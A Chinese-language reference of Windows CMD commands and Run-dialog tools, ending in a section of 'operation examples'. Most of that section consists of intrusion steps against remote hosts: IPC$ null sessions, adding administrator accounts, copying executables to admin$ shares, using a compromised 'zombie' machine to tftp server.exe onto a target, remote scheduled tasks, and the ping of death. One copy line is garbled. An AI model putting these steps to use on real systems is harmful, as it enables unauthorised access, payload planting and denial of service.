Windows命令大全
Windows命令大全
命令简介
CMD命令是一种命令提示符,CMD是command的缩写,即命令提示符(CMD),位于C:WindowsSystem32的目录下,是在OS/2,Win为基础的操作系统(包括Windows 2000和XP中,Vista中,和Server 2003)下的“MS-DOS 方式”。中文版Windows XP 中的命令提示符进一步提高了与DOS下操作命令的兼容性,用户可以在命令提示符直接输入中文调用文件。
运行流程
CMD命令:开始(Win+R)->运行->输入cmd或command(在命令行里可以看到系统版本、文件系统版本)如下图:
CMD命令—文件管理
命令 | 功能 |
---|---|
MD | 创建一个目录。 |
MKDIR | 创建一个目录。 |
MKLINK | 创建符号链接和硬链接 |
ASSOC | 显示或修改文件扩展名关联。 |
ATTRIB | 显示或更改文件属性。 |
FSUTIL | 显示或配置文件系统属性。 |
MOVE | 将一个或多个文件从一个目录移动到另一个目录。 |
COPY | 将至少一个文件复制到另一个位置。 |
REN | 重命名文件。 |
RENAME | 重命名文件。 |
REPLACE | 替换文件。 |
RMDIR | 删除目录。 |
RD | 删除目录。 |
DEL | 删除至少一个文件。 |
ERASE | 删除一个或多个文件。 |
XCOPY | 复制文件和目录树。 |
FTYPE | 显示或修改在文件扩展名关联中使用的文件类型。 |
CHDIR | 显示当前目录的名称或将其更改。 |
CD | 显示当前目录的名称或将其更改。 |
TREE | 以图形方式显示驱动程序或路径的目录结构。 |
ROBOCOPY | 复制文件和目录树的高级实用工具 |
COMP | 比较两个或两套文件的内容。 |
FC | 比较两个文件或两个文件集并显示它们之间的不同。 |
FOR | 为一组文件中的每个文件运行一个指定的命令。 |
PATH | 为可执行文件显示或设置搜索路径。 |
CMD命令—磁盘管理
命令 | 功能 |
---|---|
DIR | 显示一个目录中的文件和子目录。 |
CHKDSK | 检查磁盘并显示状态报告。 |
CHKNTFS | 显示或修改启动时间磁盘检查。 |
DISKPART | 显示或配置磁盘分区属性。 |
FORMAT | 格式化磁盘,以便用于 Windows。 |
LABEL | 创建、更改或删除磁盘的卷标。 |
VERIFY | 告诉 Windows 是否进行验证,以确保文件正确写入磁盘。 |
VOL | 显示磁盘卷标和序列号。 |
RECOVER | 从损坏的或有缺陷的磁盘中恢复可读信息。 |
CONVERT | 将 FAT 卷转换成 NTFS。你不能转换当前驱动器。 |
COMPACT | 显示或更改 NTFS 分区上文件的压缩。 |
CMD命令—系统管理
命令 | 功能 |
---|---|
MODE | 配置系统设备。 |
MORE | 逐屏显示输出。 |
SET | 显示、设置或删除 Windows 环境变量。 |
SETLOCAL | 开始本地化批处理文件中的环境更改。 |
TIME | 显示或设置系统时间。 |
DATE | 显示或设置日期。 |
VER | 显示 Windows 的版本。 |
SYSTEMINFO | 显示计算机的特定属性和配置。 |
DRIVERQUERY | 显示当前设备驱动程序状态和属性。 |
PROMPT | 更改 Windows 命令提示。 |
BREAK | 设置或清除扩展式 CTRL+C 检查。 |
BCDEDIT | 设置启动数据库中的属性以控制启动加载。 |
CMD命令—进程管理
命令 | 功能 |
---|---|
CALL | 从另一个批处理程序调用这一个。 |
SC | 显示或配置服务(后台进程)。 |
TASKLIST | 显示包括服务在内的所有当前运行的任务。 |
TASKKILL | 中止或停止正在运行的进程或应用程序。 |
IF | 在批处理程序中执行有条件的处理操作。 |
CMD命令—控制台管理
命令 | 功能 |
---|---|
CMD | 打开另一个 Windows 命令解释程序窗口。 |
COLOR | 设置默认控制台前景和背景颜色。 |
EXIT | 退出 CMD.EXE 程序(命令解释程序)。 |
CLS | 清除屏幕。 |
TITLE | 设置 CMD.EXE 会话的窗口标题。 |
DOSKEY | 编辑命令行、撤回 Windows 命令并创建宏。 |
ECHO | 显示消息,或将命令回显打开或关闭。 |
打印一个文本文件。 | |
WMIC | 在交互式命令 shell 中显示 WMI 信息。 |
HELP | 提供 Windows 命令的帮助信息。 |
PAUSE | 暂停批处理文件的处理并显示消息。 |
CMD命令—其他管理
命令 | 功能 |
---|---|
TYPE | 显示文本文件的内容。 |
CACLS | 显示或修改文件的访问控制列表(ACL)。 |
CHCP | 显示或设置活动代码页数。 |
ENDLOCAL | 结束批文件中环境更改的本地化。 |
FIND | 在一个或多个文件中搜索一个文本字符串。 |
FINDSTR | 在多个文件中搜索字符串。 |
GOTO | 将 Windows 命令解释程序定向到批处理程序中某个带标签的行。 |
GPRESULT | 显示计算机或用户的组策略信息。 |
GRAFTABL | 使 Windows 在图形模式下显示扩展字符集。 |
ICACLS | 显示、修改、备份或还原文件和目录的 ACL。 |
OPENFILES | 显示远程用户为了文件共享而打开的文件。 |
POPD | 还原通过 PUSHD 保存的当前目录的上一个值。 |
PUSHD | 保存当前目录,然后对其进行更改。 |
REM | 记录批处理文件或 CONFIG.SYS 中的注释(批注)。 |
SCHTASKS | 安排在一台计算机上运行命令和程序。 |
SHIFT | 调整批处理文件中可替换参数的位置。 |
SHUTDOWN | 允许通过本地或远程方式正确关闭计算机。 |
SORT | 对输入排序。 |
START | 启动单独的窗口以运行指定的程序或命令。 |
SUBST | 将路径与驱动器号关联。 |
Windows运行工具
开始(Win+R)->运行->输入相关工具命令
-
gpedit.msc-----组策略
-
sndrec32-------录音机
-
Nslookup-------IP地址侦测器 ,是一个 监测网络中 DNS 服务器是否能正确实现域名解析的命令行工具。它在 Windows NT/2000/XP 中均可使用 , 但在 Windows 98 中却没有集成这一个工具。
-
explorer-------打开资源管理器
-
logoff---------注销命令
-
shutdown-------60秒倒计时关机命令
-
lusrmgr.msc----本机用户和组
-
services.msc—本地服务设置
-
oobe/msoobe /a----检查XP是否激活
-
notepad--------打开记事本
-
cleanmgr-------垃圾整理
-
net start messenger----开始信使服务
-
compmgmt.msc—计算机管理
-
net stop messenger-----停止信使服务
-
conf-----------启动netmeeting
-
dvdplay--------DVD播放器
-
charmap--------启动字符映射表
-
diskmgmt.msc—磁盘管理实用程序
-
calc-----------启动计算器
-
dfrg.msc-------磁盘碎片整理程序
-
chkdsk.exe-----Chkdsk磁盘检查
-
devmgmt.msc— 设备管理器
-
regsvr32 /u *.dll----停止dll文件运行
-
drwtsn32------ 系统医生
-
rononce -p----15秒关机
-
dxdiag---------检查DirectX信息
-
regedt32-------注册表编辑器
-
Msconfig.exe—系统配置实用程序
-
rsop.msc-------组策略结果集
-
mem.exe--------显示内存使用情况
-
regedit.exe----注册表
-
winchat--------XP自带局域网聊天
-
progman--------程序管理器
-
winmsd---------系统信息
-
perfmon.msc----计算机性能监测程序
-
winver---------检查Windows版本
-
sfc /scannow-----扫描错误并复原
-
taskmgr-----任务管理器(2000/xp/2003
-
wmimgmt.msc----打开windows管理体系结构(WMI)
-
wupdmgr--------windows更新程序
-
wscript--------windows脚本宿主设置
-
write----------写字板
-
wiaacmgr-------扫描仪和照相机向导
-
winchat--------XP自带局域网聊天
-
mplayer2-------简易widnows media player
-
mspaint--------画图板
-
mstsc----------远程桌面连接
-
magnify--------放大镜实用程序
-
mmc------------打开控制台
-
mobsync--------同步命令
-
iexpress-------木马捆绑工具,系统自带
-
fsmgmt.msc-----共享文件夹管理器
-
utilman--------辅助工具管理器
-
dcomcnfg-------打开系统组件服务
-
ddeshare-------打开DDE共享设置
-
osk------------打开屏幕键盘
-
odbcad32-------ODBC数据源管理器
-
oobe/msoobe /a----检查XP是否激活
-
ntbackup-------系统备份和还原
-
narrator-------屏幕“讲述人”
-
ntmsmgr.msc----移动存储管理器
-
ntmsoprq.msc—移动存储管理员操作请求
-
netstat -an----(TC)命令检查接口
-
syncapp--------创建一个公文包
-
sysedit--------系统配置编辑器
-
sigverif-------文件签名验证程序
-
ciadv.msc------索引服务程序
-
shrpubw--------创建共享文件夹
-
secpol.msc-----本地安全策略
-
syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码
-
services.msc—本地服务设置
-
Sndvol32-------音量控制程序
-
sfc.exe--------系统文件检查器
-
sfc /scannow—windows文件保护
-
ciadv.msc------索引服务程序
-
tourstart------xp简介(安装完成后出现的漫游xp程序)
-
taskmgr--------任务管理器
-
eventvwr-------事件查看器
-
dcedit-------造字程序
-
mpmgmt.msc—计算机管理
-
ckager-------对象包装程序
-
perfmon.msc----计算机性能监测程序
-
charmap--------启动字符映射表
-
cliconfg-------SQL SERVER 客户端网络实用程序
-
Clipbrd--------剪贴板查看器
-
conf-----------启动netmeeting
-
certmgr.msc----证书管理实用程序
-
regsvr32 /u *.dll----停止dll文件运行
-
regsvr32 /u zipfldr.dll------取消ZIP支持
-
cmd.exe--------CMD命令提示符
操作示例
net use ipipc$ " " /user:" " 建立IPC空链接
net use ipipc$ “密码” /user:“用户名” 建立IPC非空链接
net use h: ipc$ “密码” /user:“用户名” 直接登陆后映射对方C:到本地为H:
net use h: ipc$ 登陆后映射对方C:到本地为H:
net use ipipc$ /del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名 密码 /add 建立用户
net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限
net start 查看开启了哪些服务
net start 服务名 开启服务;(如:net start telnet, net start schedule)
net stop 服务名 停止某服务
net time 目标ip 查看对方时间
net time 目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view ip 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip “文本信息” 向对方发信息
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C:共享
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的网络连接情况,常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR .”表示删除当前目录下所有只读文件,“DEL/A-S .”表示删除当前目录下除系统文件以外的所有文件
del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
move 盘符路径要移动的文件名 存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,“> “和”> >” 是重定向命令
at id号 开启已注册的某个计划任务
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止
at id号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器,默认端口为23
open ip 连接到IP(属telnet登陆后的命令)
telnet 在本机上直接键入telnet 将进入本机的telnet
copy 路径文件名1 路径文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
copy c:srv.exe ipadmin$ 复制本地c:srv.exe到对方的admin下
copy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
copy ipadmin s v v . e x e c : 或 : c o p y i p a d m i n svv.exe c: 或:copyipadmin svv.exec:或:copyipadmin. 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:
xcopy 要复制的文件或目录树 目标地址目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件,用参数/e才可连目录下的子目录一起复制到目标地址下。
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:server.exe 登陆后,将“IP”的server.exe下载到目标主机c:server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
tftp -i 对方IP put c:server.exe 登陆后,上传本地c:server.exe至主机
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息